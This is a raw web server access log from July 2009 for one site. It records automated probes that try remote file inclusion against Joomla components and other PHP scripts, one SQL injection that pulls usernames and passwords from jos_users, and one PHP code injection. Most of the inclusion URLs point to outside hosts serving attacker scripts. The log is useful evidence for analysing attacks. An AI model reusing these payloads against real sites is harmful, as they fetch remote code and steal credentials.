218.37.26.230 - - [05/Jul/2009:22:04:00 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
218.37.26.230 - - [05/Jul/2009:22:04:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
218.37.26.230 - - [05/Jul/2009:22:04:00 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
218.37.26.230 - - [05/Jul/2009:22:04:16 -0700] "GET /logs/access_090607.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
218.37.26.230 - - [05/Jul/2009:22:05:13 -0700] "GET /logs/access.log%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.arsenal-music.ru/modules/mod_poll/v6id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:07:33 -0700] "GET /logs//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 1944 "-" "Mozilla/5.0" "jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:07:37 -0700] "GET /?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:07:38 -0700] "GET /logs/access_090505.log%20%20//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:07:51 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:07:51 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:07:52 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:08:25 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:08:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:08:25 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
218.234.21.178 - - [05/Jul/2009:22:08:39 -0700] "GET /logs/access_090607.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
218.234.21.178 - - [05/Jul/2009:22:08:39 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
218.234.21.178 - - [05/Jul/2009:22:08:42 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://kq-china.com/web/templates/ja_purity/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
119.93.90.155 - - [05/Jul/2009:22:10:29 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:04 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:04 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:04 -0700] "GET /logs/access_090505.log%20%20//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:23 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:23 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:11:23 -0700] "GET /logs/access_090505.log%20%20//include/admin.lib.inc.php?site_path=http://www.clanazo.com/site/images/banners/links.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:12:49 -0700] "GET /logs/access_090505.log//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:13:11 -0700] "GET /logs/access_090607.log//?error=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
119.93.90.155 - - [05/Jul/2009:22:14:00 -0700] "GET /logs/access_090505.log///vwar/backup/errors.php?error=http://id1.fileave.com/id1.txt.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
74.53.70.114 - - [05/Jul/2009:22:14:53 -0700] "GET /logs/access_090505.log//include/admin.lib.inc.php?site_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
209.51.133.202 - - [05/Jul/2009:22:15:29 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
209.51.133.202 - - [05/Jul/2009:22:15:29 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
209.51.133.202 - - [05/Jul/2009:22:15:29 -0700] "GET /logs/access_090505.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://botscanner.michael17.com/BotId1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:23:41 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:23:41 -0700] "GET /include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:23:41 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:01 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:01 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 200 1946 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:02 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:05 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:05 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 1946 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:05 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:24:30 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:24:30 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:24:30 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:24:33 -0700] "GET //vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:24:33 -0700] "GET /logs///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:24:33 -0700] "GET /logs/access.log%20%20///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:36 -0700] "GET /logs/access_090607.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:24:51 -0700] "GET /logs/access_090505.log%20%20///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:24:55 -0700] "GET /logs/access_090607.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.201.81.6 - - [05/Jul/2009:22:26:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.201.81.6 - - [05/Jul/2009:22:26:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.201.81.6 - - [05/Jul/2009:22:26:11 -0700] "GET /logs/access_090522.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:27:48 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
66.197.183.21 - - [05/Jul/2009:22:27:53 -0700] "GET /logs/access_090505.log///vwar/backup/errors.php?error=http://badwolfmx3.wghost.tv/xnova//includes/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:27:55 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:27:55 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:27:55 -0700] "GET /logs/access.log%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
217.125.38.117 - - [05/Jul/2009:22:29:56 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://lpkpm.com/lib/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:19 -0700] "GET /logs/access_090505.log/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:19 -0700] "GET /logs/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:19 -0700] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:23 -0700] "GET /logs/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:23 -0700] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
84.51.241.6 - - [05/Jul/2009:22:30:23 -0700] "GET /logs/access_090505.log/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/* HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:31:11 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.208.139.72 - - [05/Jul/2009:22:31:24 -0700] "GET /logs/access_090607.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:31:44 -0700] "GET /galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:31:44 -0700] "GET /logs/access_090530.log//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:31:44 -0700] "GET /logs//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:34:47 -0700] "GET /logs/access.log//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:34:47 -0700] "GET /galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:34:47 -0700] "GET /logs//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:37:39 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:37:39 -0700] "GET /include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:37:39 -0700] "GET /logs/access_090505.log%20%20//include/admin.lib.inc.php?site_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.214.48.150 - - [05/Jul/2009:22:39:15 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.214.48.150 - - [05/Jul/2009:22:39:15 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
122.214.48.150 - - [05/Jul/2009:22:39:16 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:22 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:22 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:23 -0700] "GET /logs/access_090505.log%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:40 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:40 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
220.231.126.252 - - [05/Jul/2009:22:39:40 -0700] "GET /logs/access_090505.log%20%20//include/admin.lib.inc.php?site_path=http://www.just-photos.org/joomla/administrator/images/comprofiler/gallery/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:40:37 -0700] "GET /logs/access_090505.log/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:40:37 -0700] "GET /index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:40:37 -0700] "GET /logs/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:41:26 -0700] "GET /logs/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:41:26 -0700] "GET /logs/access_090505.log/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:41:26 -0700] "GET /index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:41:46 -0700] "GET /logs/access_090505.log//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:44:53 -0700] "GET /logs/access_090530.log%20%20//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.jainvestigation.com"
200.80.241.115 - - [05/Jul/2009:22:44:53 -0700] "GET /logs/access.log%20%20//galeria.php?start=0&kategoria=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
61.100.186.87 - - [05/Jul/2009:22:45:40 -0700] "GET /logs/access_090607.log%20%20/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
61.100.186.87 - - [05/Jul/2009:22:45:40 -0700] "GET /logs/index.php?show=http://www.ypm-lpmb.com/idx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:48:01 -0700] "GET /logs/access_090505.log%20%20/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
190.144.44.36 - - [05/Jul/2009:22:48:18 -0700] "GET /logs/access_090505.log%20%20/index.php?conteudo=http://aciel.biz.ly/dataquw/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:22:51:31 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:22:51:31 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
123.143.98.5 - - [05/Jul/2009:22:51:31 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.19.130.218 - - [05/Jul/2009:22:53:08 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
67.19.130.218 - - [05/Jul/2009:22:53:08 -0700] "GET /logs/access_090607.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
67.19.130.218 - - [05/Jul/2009:22:53:08 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
122.214.48.150 - - [05/Jul/2009:22:53:42 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://www.recanatini.it/images/baner.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "jainvestigation.com"
67.19.130.218 - - [05/Jul/2009:22:55:40 -0700] "GET /logs/access_090607.log%20/bookmark4u/lostpasswd.php?env[include_prefix]=http://defensive.ru//prog/lib/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:00:35 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:00:35 -0700] "GET /logs/access_090505.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:00:35 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:01:44 -0700] "GET /logs/access_090607.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:04:46 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:04:46 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:04:47 -0700] "GET /logs/access_090530.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:13 -0700] "GET /logs/access_090530.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:13 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
67.18.161.226 - - [05/Jul/2009:23:05:13 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aman.or.id/administrator/includes/js/j.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
